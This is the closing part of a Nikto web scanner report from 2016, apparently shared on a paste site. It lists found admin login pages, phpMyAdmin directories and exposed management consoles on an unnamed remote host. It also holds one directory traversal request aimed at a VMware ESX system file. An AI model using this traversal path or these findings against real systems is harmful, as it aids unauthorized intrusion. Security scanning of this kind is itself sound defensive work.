  1030. + /ss_vms_admin_sm/: Admin login page/section found.
  1031. + /sshadmin/: Admin login page/section found.
  1032. + /staradmin/: Admin login page/section found.
  1033. + /sub-login/: Admin login page/section found.
  1034. + /Super-Admin/: Admin login page/section found.
  1035. + /support_login/: Admin login page/section found.
  1036. + /sys-admin/: Admin login page/section found.
  1037. + /sysadmin.asp: Admin login page/section found.
  1038. + /sysadmin.html: Admin login page/section found.
  1039. + /sysadmin.php: Admin login page/section found.
  1040. + /sysadmin/: Admin login page/section found.
  1041. + /SysAdmin/: Admin login page/section found.
  1042. + /SysAdmin2/: Admin login page/section found.
  1043. + /sysadmins/: Admin login page/section found.
  1044. + /system_administration/: Admin login page/section found.
  1045. + /system-administration/: Admin login page/section found.
  1046. + /ur-admin.asp: Admin login page/section found.
  1047. + /ur-admin.html: Admin login page/section found.
  1048. + /ur-admin.php: Admin login page/section found.
  1049. + /ur-admin/: Admin login page/section found.
  1050. + /useradmin/: Admin login page/section found.
  1051. + /UserLogin/: Admin login page/section found.
  1052. + /utility_login/: Admin login page/section found.
  1053. + /v2/painel/: Admin login page/section found.
  1054. + /vadmind/: Admin login page/section found.
  1055. + /vmailadmin/: Admin login page/section found.
  1056. + /webadmin.asp: Admin login page/section found.
  1057. + /webadmin.html: Admin login page/section found.
  1058. + /webadmin.php: Admin login page/section found.
  1059. + /webmaster/: Admin login page/section found.
  1060. + /websvn/: Admin login page/section found.
  1061. + /wizmysqladmin/: Admin login page/section found.
  1062. + /wp-admin/: Admin login page/section found.
  1063. + /wp-login/: Admin login page/section found.
  1064. + /xlogin/: Admin login page/section found.
  1065. + /yonetici.asp: Admin login page/section found.
  1066. + /yonetici.html: Admin login page/section found.
  1067. + /yonetici.php: Admin login page/section found.
  1068. + /yonetim.asp: Admin login page/section found.
  1069. + /yonetim.html: Admin login page/section found.
  1070. + /yonetim.php: Admin login page/section found.
  1071. + OSVDB-3092: /test.asp: This might be interesting...
  1072. + OSVDB-3092: /test.aspx: This might be interesting...
  1073. + OSVDB-3092: /test.php: This might be interesting...
  1074. + /maintenance.asp: This might be interesting...
  1075. + /maintenance.aspx: This might be interesting...
  1076. + /maint/: This might be interesting...
  1077. + /maint.asp: This might be interesting...
  1078. + /maint.aspx: This might be interesting...
  1079. + OSVDB-59440: /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml: VMWare ESX is vulnerable to a directory traversal attack.
  1080. + /jk-status: mod_jk status page is visible.
  1081. + /balancer-manager: mod_proxy_balancer management page is visible.
  1082. + /servlets-examples/: Tomcat servlets examples are visible.
  1083. + /admin-console: JBoss admin console is visible.
  1084. + /help.php: A help file was found.
  1085. + /wordpress/: A Wordpress installation was found.
  1086. + /gif/hp_invent_logo.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
  1087. + /gif/tricolor_ink_guage.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
  1088. + OSVDB-3092: /messages/: This might be interesting...
  1089. + OSVDB-3092: /cms/: This might be interesting...
  1090. + OSVDB-3092: /helpdesk/: This might be interesting...
  1091. + /3rdparty/phpMyAdmin/: phpMyAdmin directory found
  1092. + /phpMyAdmin/: phpMyAdmin directory found
  1093. + /3rdparty/phpmyadmin/: phpMyAdmin directory found
  1094. + /phpmyadmin/: phpMyAdmin directory found
  1095. + /pma/: phpMyAdmin directory found
  1096. + 6456 items checked: 27 error(s) and 1088 item(s) reported on remote host
  1097. + End Time: 2016-02-22 13:05:06 (8473 seconds)
  1098. ---------------------------------------------------------------------------
  1099. + 1 host(s) tested
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement